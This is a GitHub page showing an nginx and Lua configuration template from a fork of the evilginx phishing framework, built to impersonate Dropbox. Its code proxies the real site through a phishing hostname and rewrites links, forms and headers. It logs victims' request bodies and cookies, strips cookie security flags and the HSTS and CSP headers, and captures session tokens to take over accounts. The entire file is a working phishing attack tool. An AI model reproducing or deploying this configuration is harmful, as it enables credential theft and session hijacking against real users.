forked from kgretzky/evilginx
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwww.dropbox.com.conf
157 lines (129 loc) · 4.65 KB
/
www.dropbox.com.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
log_format dropbox_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';
server {
listen 80;
listen 443 ssl;
server_name {{PHISH_HOSTNAME[0]}};
ssl_certificate {{CERT_PUBLIC_PATH}};
ssl_certificate_key {{CERT_PRIVATE_PATH}};
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
if ($scheme = http) {
return 301 https://$server_name$request_uri;
}
location / {
client_body_buffer_size 64k;
proxy_pass https://{{TARGET_HOST[0]}};
proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
proxy_cookie_domain {{TARGET_HOST[0]}} {{PHISH_HOSTNAME[0]}};
proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;
sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
sub_filter '"{{TARGET_HOST[0]}}"' '"{{PHISH_HOSTNAME[0]}}"';
sub_filter '"dropbox.com"' '"{{PHISH_DOMAIN}}"';
sub_filter_once off;
sub_filter_types application/json;
set $auth_token "lid";
proxy_set_header Accept-Encoding "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
set_unescape_uri $redir $arg_{{REDIR_ARG}};
set $set_cookies_all "";
access_log {{LOG_DIR}}{{LOG_NAME}} dropbox_phish;
access_by_lua_block {
if ngx.var.http_origin ~= nil then
val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Origin", val)
end
if ngx.var.http_referer ~= nil then
val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Referer", val)
end
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil and c_rd ~= nil then
ngx.redirect(c_rc)
end
end
if ngx.var.http_cookie ~= nil then
local m_t = ngx.re.match(ngx.var.http_cookie, "\\bt=([^;]*)")
if m_t then
c_t = m_t[1]
ngx.log(ngx.NOTICE, c_t)
ngx.req.read_body()
local body = ngx.req.get_body_data()
if body ~= nil then
newbody, n, err = ngx.re.gsub(body, "\\bt=[^&]*", "t=" .. c_t)
if newbody then
ngx.log(ngx.NOTICE, newbody)
ngx.req.set_body_data(newbody)
end
end
end
end
}
header_filter_by_lua_block {
function get_cookies()
local cookies = ngx.header.set_cookie or {}
if type(cookies) == "string" then
cookies = {cookies}
end
return cookies
end
function add_cookie(cookie)
local cookies = get_cookies()
table.insert(cookies, cookie)
ngx.header.set_cookie = cookies
end
function exists_cookie(cookie)
local cookies = get_cookies()
for i, val in ipairs(cookies) do
if string.match(val, "^" .. cookie .. "=") ~= nil then
return true
end
end
return false
end
ngx.header["Strict-Transport-Security"] = {}
ngx.header["Content-Security-Policy"] = {}
if ngx.var.redir ~= "" then
local r_url = ngx.var.redir
if string.sub(r_url,1,1) == '0' then
val = string.sub(ngx.var.redir, 2)
r_url = ngx.decode_base64(val)
end
add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
end
if ngx.header.location then
end
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil then
if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
ngx.header.location = ngx.unescape_uri(c_rc)
add_cookie("{{SUCCESS_ARG}}=true; path=/")
end
end
end
if ngx.header.set_cookie then
local cookies = ngx.header.set_cookie
if not cookies then return end
if type(cookies) ~= "table" then cookies = {cookies} end
local newcookies = {}
local allcookies = ""
for i, val in ipairs(cookies) do
val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
val = string.gsub(val, '; *[sS]ecure', "")
table.insert(newcookies, val)
if i>1 then allcookies = allcookies .. "||" end
allcookies = allcookies .. val
end
ngx.header.set_cookie = newcookies
ngx.var.set_cookies_all = allcookies
end
}
}
}